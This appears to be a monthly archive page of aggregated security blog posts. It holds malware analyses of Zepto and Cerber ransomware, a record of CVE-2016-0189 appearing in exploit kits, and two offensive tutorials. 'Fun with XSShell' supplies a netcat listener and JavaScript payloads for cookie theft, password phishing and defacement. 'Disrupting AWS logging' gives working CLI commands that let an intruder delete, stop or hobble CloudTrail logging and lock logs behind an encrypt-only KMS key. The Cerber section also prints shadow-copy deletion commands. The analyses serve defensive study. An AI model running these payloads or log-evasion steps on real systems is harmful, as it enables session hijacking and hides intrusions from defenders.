Monthly Archives: July 2016

Infosec Writers

Got a topic you've become very knowledgeable about and would like to share your expertise? Want to add to the cumulative knowledge base of InfoSec/NetSec? You can write and submit your paper(s) to Infosec Writers and, if a paper meets their criteria for suitability, have it published on their site.

Zepto Ransomware Packed into WSF Spam

ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the common JavaScript and macro documents being spammed previously.

Here are actual emails featuring familiar social engineering tactics:

ransomware spam infected WSF attachment

ransomware spam infected WSF attachment

ransomware spam infected WSF attachment

The zip attachments contain the WSF.

infected WSF file


An Interactive Analysis with ThreatAnalyzer

To see what we’re dealing with, we turned to ThreatTrack’s malware analysis sandbox ThreatAnalyzer.

We extracted the WSF, submitted it to ThreatAnalyzer and generated the following threat analysis:

Zepto ransomware analysis

Since this is a script, we are more concerned with the call tree from WScript.exe. One notable result, circled above, is the large number of modified files, which strongly suggests either a file-infecting virus or ransomware. And considering the proliferation of ransomware attacks lately, that's our biggest concern.

Two screenshots were captured during our analysis.

Zepto ransomware analysis infection screen

Expanding the MODIFIED FILES shows this result.

ransomware modified files

The files affected are renamed with a “.zepto” filename extension.

Given the screenshot and Modified Files artifacts, we can confidently say that this is a variant of the Zepto ransomware.

The WSF Script Behavior

Selecting C:\Windows\System32\WScript.exe (3388) shows the behaviors performed by the WSF alone.

ransomware sandbox analysis

ransomware sandbox analysis

It shows that the script created two files and made an HTTP connection to

Let’s look at the two files in the Temp folder.

This is the binary view of the UL43Fok40ii file:

Zepto ransomware encrypted code

This is the UL43Fok40ii.exe file: a complete, well-formed PE file.

ransomware code processes analysis

The two files differ in size by only 4 bytes (208,008 versus 208,004 bytes), which suggests that the file without the .exe filename extension was decrypted to produce the PE executable. Afterwards, the WSF script ran the PE executable with the argument "321".
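A 4-byte overhead is consistent with a small key or header prepended to the payload. The actual encoding scheme isn't identified in this analysis, so purely as a hypothetical illustration, here is a toy decoder that assumes the first 4 bytes are an XOR key:

```python
import itertools

def decode_payload(blob: bytes) -> bytes:
    """Hypothetical decoder: treat the first 4 bytes as an XOR key
    applied to the remainder of the blob."""
    key, body = blob[:4], blob[4:]
    return bytes(b ^ k for b, k in zip(body, itertools.cycle(key)))

# Round trip with made-up data: the encoded blob is exactly 4 bytes
# larger than the decoded image (208,008 vs. 208,004 bytes).
pe_image = b"MZ" + bytes(208_002)  # stand-in for the real executable
key = bytes.fromhex("1337abcd")
encoded = key + bytes(b ^ k for b, k in zip(pe_image, itertools.cycle(key)))

assert len(encoded) == 208_008 and len(pe_image) == 208_004
assert decode_payload(encoded) == pe_image
```

Again, this is a sketch of one plausible scheme that fits the observed sizes, not the sample's actual decryption routine.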

ransomware sandbox analysis


Expanding the Network connections shows the following:

ransomware sandbox analysis

ransomware sandbox analysis

Judging by the top-level domain of the resolved host, the server appears to be located in Malaysia.

The HTTP header also indicates a Content-Length of 208,008 bytes, the same size as the encrypted file.

In short, the WSF file executed by WScript.exe downloaded an encrypted Windows PE file, decrypted it, and ran it.

The Downloaded Executable PE file

Now we turn our focus to the behavior of the executable file UL43Fok40ii.exe.

Zepto ransomware sandbox analysis

  • Posted some info to a server somewhere in Ukraine.
  • Accessed hundreds of files.
  • Executed the default browser (Chrome was set as the default browser)
  • Deleted a file using cmd.exe

ransomware sandbox analysis

  • Connected to shares
  • Dropped the ransom instructions (_HELP_instructions.html). For every folder where a file got encrypted for ransom, a copy of the _HELP_instructions.html is created.

ransomware sandbox analysis

  • Created 10 threads

The data posted to the Ukraine site is encrypted. Most likely this contains the id and key used to encrypt the files.


ThreatAnalyzer displays the raw data in hexadecimal form. A partially converted version of the raw data is shown below:



This malware also renamed a large number of files. This is the encryption behavior: each file is encrypted and renamed to a GUID-style filename with a ".zepto" filename suffix.
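The renaming can be mimicked in a few lines. Note that the GUID layout below is an assumption for illustration, not the malware's reverse-engineered format:

```python
import os
import uuid

def zepto_rename(path: str) -> str:
    """Sketch of the observed renaming: the original filename is discarded
    entirely and replaced by a GUID-style name ending in ".zepto".
    The exact GUID layout here is assumed, not taken from the sample."""
    guid = uuid.uuid4().hex.upper()
    new_name = "{}-{}.zepto".format(guid[:16], guid[16:])
    return os.path.join(os.path.dirname(path), new_name)

renamed = zepto_rename("/home/victim/documents/report.docx")
assert renamed.endswith(".zepto")
assert "report" not in renamed  # nothing of the original name survives
```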


When searching for files to encrypt, it targets the phone book file first before traversing the drive from its root directory.


Some notable files were also created. The captured screenshot shows the contents of the _HELP_instructions.bmp file.


This malware sample attempts to move its running executable to a file in the Temp folder.


With Chrome set as the default browser, the malware opens the _HELP_instructions.html file it previously created on the Desktop. It also deletes the malware copy from the Temp folder, probably as part of its cleanup phase.


Here’s what _HELP_instructions.html looks like when opened in a browser.


The processes in the call tree under Chrome.exe were most likely invoked by the browser and are not part of this malware.

Prevent Ransomware

Syndicates behind today's ransomware, like Zepto, are aggressively finding various ways of infiltrating businesses and government organizations alike. In this case, they attacked using Windows Scripting Files in hopes of passing through email gateways that don't block WSF attachments.

To protect your organization, deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure. And regularly back up all your critical data.

VIPRE antivirus detections for this threat include Trojan.Locky.AX and Trojan.Win32.Generic!BT.

The post Zepto Ransomware Packed into WSF Spam appeared first on ThreatTrack Security Labs Blog.

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document, a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case we observed the macro code calling PowerShell to bypass execution policies, running in hidden as well as encrypted mode, with the intention that PowerShell would download the ransomware and execute it without the victim's knowledge.

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\<GUID>), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

If the malware is not launched from the aforementioned folder, then, after eliminating any blacklisted filenames from an internal list, it creates a renamed copy of itself at "%APPDATA%\<GUID>" using a pseudo-randomly selected name from the "system32" directory. It then executes the copy from the new location and cleans up after itself.

Shadow deletion

As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplishes this by launching the following processes with the respective arguments:

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures"
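From the defender's side, these exact command lines are a high-signal detection opportunity. A minimal sketch (the helper function and log format are my own illustration, not part of any specific product):

```python
# Command-line fragments drawn from the Cerber process launches above.
TAMPERING_PATTERNS = [
    ("vssadmin.exe", "delete shadows"),
    ("wmic.exe", "shadowcopy delete"),
    ("bcdedit.exe", "recoveryenabled no"),
    ("bcdedit.exe", "bootstatuspolicy ignoreallfailures"),
]

def is_backup_tampering(image: str, command_line: str) -> bool:
    """Flag process launches matching known shadow-copy or
    boot-recovery tampering patterns."""
    image, command_line = image.lower(), command_line.lower()
    return any(image.endswith(proc) and frag in command_line
               for proc, frag in TAMPERING_PATTERNS)

assert is_backup_tampering(r"C:\Windows\System32\vssadmin.exe",
                           "delete shadows /all /quiet")
assert not is_backup_tampering(r"C:\Windows\System32\svchost.exe", "-k netsvcs")
```

Legitimate administration rarely runs these exact combinations, which is why many endpoint products alert on them.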


People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.



Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4. Interface provided to the victim to pay ransom supports 12 languages


Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as .ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers' geography: 1049—Russian, 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).
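That keyboard-layout gate amounts to a simple set lookup. A sketch using the LCIDs listed above (the function name and structure are illustrative, not the malware's code):

```python
# Keyboard-layout LCIDs the malware avoids, per the list above.
BLACKLISTED_LAYOUTS = {
    1049, 1058, 1059, 1064, 1067, 1068, 1079, 1087,
    1088, 1090, 1091, 2072, 2073, 2092, 2115,
}

def infection_allowed(keyboard_lcid: int) -> bool:
    """Mimic the malware's geography gate: bail out on blacklisted layouts."""
    return keyboard_lcid not in BLACKLISTED_LAYOUTS

assert not infection_allowed(1049)  # Russian layout: malware aborts
assert infection_allowed(1033)      # English (US): malware proceeds
```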

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.
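Those artifact checks boil down to membership tests over loaded modules, file paths, and the volume serial number. A rough re-creation for detection research, using the indicators listed above (this is not the malware's exact logic):

```python
SANDBOX_MODULES = {"sbiedll.dll", "dir_watch.dll", "api_log.dll", "dbghelp.dll"}
SANDBOX_PATH_MARKERS = ["c:\\popupkiller.exe", "c:\\stimulator.exe",
                        "c:\\tools\\execute.exe",
                        "\\sand-box\\", "\\cwsandbox\\", "\\sandbox\\"]
SANDBOX_VOLUME_SERIALS = {"0CD1A40", "6CBBC508", "774E1682", "837F873E", "8B6F64BC"}

def looks_like_sandbox(loaded_modules, file_paths, volume_serial):
    """Approximate the environment checks: sandbox/hook DLLs,
    tell-tale file paths, and known sandbox volume serial numbers."""
    if any(m.lower() in SANDBOX_MODULES for m in loaded_modules):
        return True
    if any(marker in p.lower()
           for p in file_paths for marker in SANDBOX_PATH_MARKERS):
        return True
    return volume_serial.upper() in SANDBOX_VOLUME_SERIALS

assert looks_like_sandbox(["SbieDll.dll"], [], "00000000")  # Sandboxie DLL
assert looks_like_sandbox([], ["C:\\cwsandbox\\sample.exe"], "00000000")
assert not looks_like_sandbox(["kernel32.dll"], ["C:\\Users\\a.exe"], "12345678")
```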

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.


Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence methods such as run and runonce key are also used.
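Those persistence locations are straightforward to audit. A sketch that checks a registry snapshot for values pointing into %APPDATA%, where Cerber copies itself (the hive paths and the snapshot format are my assumptions, matched to the mechanisms described above):

```python
# Autorun locations matching the persistence mechanisms above.
AUTORUN_LOCATIONS = {
    "screensaver": "HKCU\\Control Panel\\Desktop\\SCRNSAVE.EXE",
    "command_processor": "HKLM\\SOFTWARE\\Microsoft\\Command Processor\\AutoRun",
    "run": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "runonce": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
}

def suspicious_autoruns(snapshot):
    """Given a {registry_path: value} snapshot, return the persistence
    locations whose value points into %APPDATA%."""
    return [name for name, path in AUTORUN_LOCATIONS.items()
            if "appdata" in snapshot.get(path, "").lower()]

# Hypothetical snapshot: a screensaver hijack pointing into AppData.
snapshot = {
    "HKCU\\Control Panel\\Desktop\\SCRNSAVE.EXE":
        "C:\\Users\\victim\\AppData\\Roaming\\{guid}\\payload.exe",
}
assert suspicious_autoruns(snapshot) == ["screensaver"]
```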
A Solid Defense

Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven't explicitly whitelisted. However, these controls may not be sufficient to prevent all infections, or they may not be feasible in your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.


Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discrete individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step further and contact relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

Fun with XSShell

So this is kinda fun. With this page open, copy and paste one of the listener commands from below into a terminal window on your local machine. Then, paste alert(42) into the resulting shell and press "Enter". Once you recover from the initial shock of what you just witnessed, play with the following payloads and spend the next hour of your life thoroughly enjoying yourself.



Linux (GNU netcat, which takes the port via -p):

while :; do printf "j$ "; read c; printf "HTTP/1.1 200 OK\n\n$c" | nc -lp 8000 >/dev/null; done

macOS/BSD (BSD netcat, which takes the port as an argument):

while :; do printf "j$ "; read c; printf "HTTP/1.1 200 OK\n\n$c" | nc -l 8000 >/dev/null; done
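If neither netcat variant is handy, here is a rough Python equivalent of the same loop (my own stand-in, not from the original post): it prompts for JavaScript and serves it as a bare HTTP 200 response, exactly like the nc one-liners.

```python
import socket

def build_response(js: str) -> bytes:
    """Mirror the nc one-liner: a bare HTTP 200 whose body is the JS."""
    return b"HTTP/1.1 200 OK\n\n" + js.encode()

def xsshell_listener(port: int = 8000) -> None:
    """Prompt for a payload, serve it to the next request, repeat."""
    while True:
        payload = input("j$ ")
        with socket.socket() as srv:
            srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            srv.bind(("", port))
            srv.listen(1)
            conn, _ = srv.accept()
            conn.recv(65536)  # read and discard the incoming request
            conn.sendall(build_response(payload))
            conn.close()
```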

Example Payloads


Redirect

window.location = ''


Phishing

i=new Image();i.src=""+prompt("Password:")
  • Requires a second listener, e.g. python -m "SimpleHTTPServer" 8888.

Session Hijacking

i=new Image();i.src=""+document.cookie
  • Requires a second listener, e.g. python -m "SimpleHTTPServer" 8888.


Defacement

d=document;e=d.createElement("p");e.innerHTML="lanmaster53 wuz here!";d.body.appendChild(e)


This is all based on the code shared in the following tweets.

Check the source code here ^^^ for the active payload.

CVE-2016-0189 (Internet Explorer) and Exploit Kit

Spotted in the wild by Symantec and patched with MS16-051 in May 2016, CVE-2016-0189 is now being integrated into exploit kits.

Neutrino Exploit Kit :
Here it is on 2016-07-13, but I am being told that I am late to the party.
It has already been documented here [CN].

Neutrino after ScriptJS redirector dropping Locky Affid 13- 2016-07-13

Flash sample in that pass : 85b707cf63abc0f8cfe027153031e853fe452ed02034b792323eecd3bc0f7fd
(Out of topic payload : 300a51b8f6ad362b3e32a5d6afd2759a910f1b6608a5565ddee0cad4e249ce18 - Locky Affid 13 )

Thanks to Malc0de for invaluable help here :)

Files Here: Neutrino_CVE-2016-0189_160714 (Password is malware - VT Link)

Sundown :
Some evidence of CVE-2016-0189 being integrated into Sundown was spotted on July 15 by @criznash.
On the 16th, I recorded a pass where CVE-2016-0189 had its own calls:

Sundown exploiting CVE-2016-0189 to drop Smokebot on the 2016-07-16
(Out of topic payload :  61f9a4270c9deed0be5e0ff3b988d35cdb7f9054bc619d0dc1a65f7de812a3a1 beaconing to : | )
Files : Sundown_CVE-2016-0189_160716 (password is malware)

RIG :
I saw it on 2016-09-12, but it might have appeared before.
RIG successfully exploiting CVE-2016-0189 - 2016-09-12

CVE-2016-0189 from RIG after 3 step decoding pass

Files : RIG_2016-0189_2016-09-12 (password is malware)

Magnitude :
Here is a pass from 2016-09-16, but it has been inside Magnitude since at least 2016-09-04 (Source: Trend Micro - Thanks).

CVE-2016-0189 in Magnitude on 2016-09-16
Sorry, I can't share the Fiddler capture publicly in this case (those specific ones would give the attack side too much information about some of the techniques that can be used - you know how to contact me).

Out of topic Payload:  Cerber

GrandSoft :
Spotted first on 2017-09-22; here is traffic from 2018-01-30 on Win10 Build 10240 - IE11.0.10240.16431 - KB3078071.

CVE-2016-0189 in GrandSoft on 2018-01-30
Out of topic Payload:  GandCrab Ransomware

Fiddler here : (pass is malware)

Edits :
2016-07-15 a previous version was stating CVE-2015-5122 for nw23. Fixed thanks to @dnpushme
2016-07-20 Adding Sundown.
2016-09-17 Adding RIG
2016-09-19 Adding Magnitude
2018-01-30 Adding GrandSoft (but appeared there on 2017-09-22)

Read More :
Patch Analysis of CVE-2016-0189 - 2016-06-22 - Theori
Neutrino EK: fingerprinting in a Flash - 2016-06-28 - Malwarebytes

Post publication Reading :
Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release - 2016-07-14 - FireEye

A Look at the Cerber Office 365 Ransomware

Reports of a zero-day attack affecting numerous Office 365 users emerged late last month (hat tip to the researchers at Avanan), and the culprit was a new variant of the Cerber ransomware discovered earlier this year. As with the other zero-day threats that have been popping up like mushrooms of late, the main method of infection is through the use of Office macros.

This blog provides an analysis of the Cerber variant using traditional reverse engineering and the newest version of ThreatTrack's malware analysis sandbox, ThreatAnalyzer 6.1.

Analyzing Cerber

Reverse engineering, more often than not, requires getting a broad view of what the target is doing. Whether you're analyzing a malware sample or trying to figure out what a function does in obfuscated code, it is best to get the general "feel" of your target before narrowing down to the specifics.

ThreatAnalyzer is a sandbox that executes a program, file or URL in a controlled, monitored environment and provides a detailed report enabling the researcher or analyst to get a good look at what the sample will do at run time. It is also worth noting that a sandbox is a good tool for generating threat intelligence to quickly obtain IOCs (Indicators of Compromise). The latest version of this sandbox, ThreatAnalyzer 6.1, has a built-in behavioral detection mechanism that enables users to see the general behavior of a sample and, based on that particular set of behaviors, predict whether the program in question is malicious or benign in nature.

Fig: ThreatAnalyzer’s unique behavior determination engine



Fig 1: ThreatAnalyzer 6.1 in action


Looking at the analysis screen in the figure above, ThreatAnalyzer 6.1 provides the following vital information about this particular sample:

  1. Determines that the sample is malicious on 3 different fronts:
    1. ThreatIQ (our integrated threat intelligence server) observes the sample trying to beacon to blacklisted URLs
    2. The sample is detected by one or more antivirus engines
    3. Based on the behaviors it performed, the sample has a high probability of being malicious
  2. Shows the researcher/user the registry changes, file I/O, network attempts and spawned processes
  3. Compacts all the detailed information it has gathered into a downloadable PDF or XML report. If the user chooses, they can download an archive that includes the detailed report, any significant files that were generated, screenshots of the spawned windows and a copy of the PCAP file if any network activities were logged

ThreatAnalyzer also provides a detailed report of the sample you analyzed in XML, JSON or PDF format. These reports contain the processes that were spawned, what files were modified, created or accessed, registries that were manipulated, objects that were created and any network connections that were made.

If we look further at the particular XML file of the sample we analyzed, we can gather the following activities:

  • Spawned WINWORD.EXE (normal since we fed a DOTM file), but the process tree shows that it spawned
    • Cmd.exe
    • Wscript.exe
  • Created a randomly named VBS file in %appdata%
    • %appdata%\15339.vbs
    • Cmd.exe /V /C set “GSI=%APPDATA%\%RANDOM%.vbs” (for %i in (“DIm RWRL” “FuNCtioN GNbiPp(Pt5SZ1)” “EYnt=45” “GNbiPp=AsC(Pt5SZ1)” “Xn1=52” “eNd fuNCtiON” “SUb OjrYyD9()” …
  • Seeded another cmd.exe calling the VBS file
  • Made an attempt to connect to
    • httx://
  • Made a randomly named .TMP in %appdata% and executed it
    • Hash: ee0828a4e4c195d97313bfc7d4b531f1

These are highly suspicious activities given that we were trying to analyze an Office document; the behavior above cannot be classified as normal. So the next time you're nervous about opening an attachment, even if it came from a person or organization you know, feed it to a sandbox like ThreatAnalyzer and have a look before running it on your production machine.

Good ol’ reverse engineering

Office 365 Enable Content


Looking at how this ransomware was coded, it will not only infect Office 365 users but also users of Office 2007 and above. The macro inside the Document_Open function will auto-execute once the malicious Office attachment is opened. But this also depends on whether macros are enabled or, in earlier Office versions, security is set to low. And, quite possibly in an attempt to slow down the analysis process and bypass traditional AV signatures, each iteration of this Cerber macro variant is obfuscated.

Auto-execution macro inside Cerber macro


The macro will then proceed to create a script located in %appdata%. The VBS is also obfuscated, but luckily not encrypted. It is interesting to note a particular action that may or may not be an intended feature to bypass behavioral detection: it uses the Timer function to generate a random integer and compares it against a self-generated variable, and this comparison gates the code that downloads the cryptor component.

Using the built-in network features of VBS, it will attempt to connect to a remote server and download a particular file.


This may seem harmless, as it is just a simple JPG file, right? Well, the VBS code also indicates that it will take the contents of that file, save them to a .TMP file in %appdata% and execute it. Although this technique has been used by other malware for years, it is still interesting.

Download the file, save it, then Run


Md5 Hash: ee0828a4e4c195d97313bfc7d4b531f1
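One cheap defensive check for this download-then-execute pattern: content claiming to be an image but carrying a Windows executable header. A sketch (the helper function is my own illustration):

```python
def pe_masquerading_as_image(data: bytes, filename: str) -> bool:
    """Flag payloads whose bytes begin with the PE "MZ" magic while the
    filename claims an image format, like the fake JPG downloaded here."""
    image_exts = (".jpg", ".jpeg", ".png", ".gif", ".bmp")
    return data[:2] == b"MZ" and filename.lower().endswith(image_exts)

assert pe_masquerading_as_image(b"MZ\x90\x00\x03", "picture.jpg")
assert not pe_masquerading_as_image(b"\xff\xd8\xff\xe0", "picture.jpg")  # real JPEG
```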

The downloaded file is the cryptor component of the Cerber ransomware. This program is responsible for scanning and encrypting target files on a victim's system. The full analysis of this component will be discussed in a separate blog. It is interesting to note that the downloaded Cerber executable will encrypt your files even without an internet connection: the code inside the EXE indicates that it does not need to connect to a remote server (unlike those before it, e.g. CryptoWall, Locky, TeslaCrypt) to encrypt the victim's files.

Once a system is successfully infected, it will display the following on the desktop.

And spawn an instance of your browser containing the message:

And play a sound “your documents, photos, databases, and other important files have been encrypted” in a robot voice.

Infection Summary

Flow of the Cerber attack scenario


  1. A spear-phishing email arrives carrying a malicious Office attachment.
  2. If the user opens the email, executes the attachment AND the Office macro setting is enabled, the macro will run, spawning a VBS script.
  3. The script contacts a remote server, then downloads and executes the cryptor component of the Cerber ransomware.
  4. The cryptor scans and encrypts the user's files.
  5. A notice is displayed that the system has been infected by Cerber ransomware.

The post A Look at the Cerber Office 365 Ransomware appeared first on ThreatTrack Security Labs Blog.

Disrupting AWS logging

So you’ve pwned an AWS account — congratulations — now what? You’re eager to get to the data theft, amirite? What about that whole cyber kill chain thing; installation, command & control, actions on objectives?

What if someone is watching? Too many questions guy… Let’s just disable logging and move on to the fun stuff.

The main source of log data in AWS is CloudTrail.

You can use AWS CloudTrail to get a history of AWS API calls and related events for your account. This includes calls made by using the AWS Management Console, AWS SDKs, command line tools, and higher-level AWS services.

Let’s check out what CloudTrails are enabled:

aws cloudtrail describe-trails

If you see an empty list, you might want to send your victim a t-shirt and thank them for their participation, kind of like a reverse bug bounty. If you see one or more trails, the fun starts now.

Depending on your mood (and occasionally your pwned account’s access policy), AWS offers a buffet of options. So much so, I used to be indecisive but now I’m not so sure.

Starting with the obvious and loudest, deleting the CloudTrail:

aws cloudtrail delete-trail --name [my-trail]

Only slightly less obvious, disabling logging:

aws cloudtrail stop-logging --name [my-trail]

Your target may be actively monitoring both of those API calls so those tactics are probably best left to nights of drunken regret and forcefully purged with tequila.

Most resources in AWS are region specific. However, CloudTrail is a little different: trails can be configured to be global (multi-region). While single-region is the API default, it's not super common for a trail to stay bound to its home region, and that makes the multi-region setting a perfect target for manipulation. Disabling multi-region logging gives you free rein in every region except the one the trail was created in.

aws cloudtrail update-trail --name [my-trail] --no-is-multi-region-trail --no-include-global-service-events

You may have noticed two flags being unset in the above command. The second also “specifies whether the trail is publishing events from global services such as IAM”, which is handy if you want to, say, create some backdoor accounts and API keys. It can only be unset if the first is also unset, which is unfortunate for stealthiness.

One of the great things about AWS is they’ve really thought about security. In fact, they’ve created many services specifically designed and dedicated to security. For example, the Key Management Service (KMS) tightly integrates with other services to provide almost seamless encryption. It just so happens that integration includes CloudTrail.

It’s a little bit more effort to get CloudTrail encryption bootstrapped but it’s well worth it. Once enabled, log files will be encrypted but everything else will look normal; configuration will remain almost identical and log files will continue to be delivered to the correct location, in the expected structure.

First, let’s set up a policy file for a new key, ensuring it only allows encryption by CloudTrail and nothing else — we don’t want those pesky administrators using it for decryption. Note the references to [account-id], which have to be replaced as appropriate.

AWS policies default to deny, so this policy also denies its own deletion. That's not useful per se, but it's a painful kick to the nether regions, requiring manual intervention from AWS Support to undo.
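The policy file itself doesn't survive in this copy of the post, so here is a minimal sketch of what such an encrypt-only key policy can look like (the Sid and exact condition are illustrative; replace [account-id] as noted). Because nothing grants kms:Decrypt or key administration, the default deny covers everything else, including deletion:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "CloudTrailEncryptOnly",
      "Effect": "Allow",
      "Principal": { "Service": "cloudtrail.amazonaws.com" },
      "Action": "kms:GenerateDataKey*",
      "Resource": "*",
      "Condition": {
        "StringLike": {
          "kms:EncryptionContext:aws:cloudtrail:arn": "arn:aws:cloudtrail:*:[account-id]:trail/*"
        }
      }
    }
  ]
}
```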

Create a key, attaching the policy:

aws kms create-key --bypass-policy-lockout-safety-check --policy [file:///my-policy.json]

The “bypass-policy-lockout-safety-check” flag allows you to make the key’s policy immutable after creation, making logging just an exercise in lighting money on fire with disk consumption. You can’t say Amazon didn’t warn you!

Finally, put it all together by encrypting the target trail with the immutable encryption-only key:

aws cloudtrail update-trail --name [my-trail] --kms-key-id [my-key]

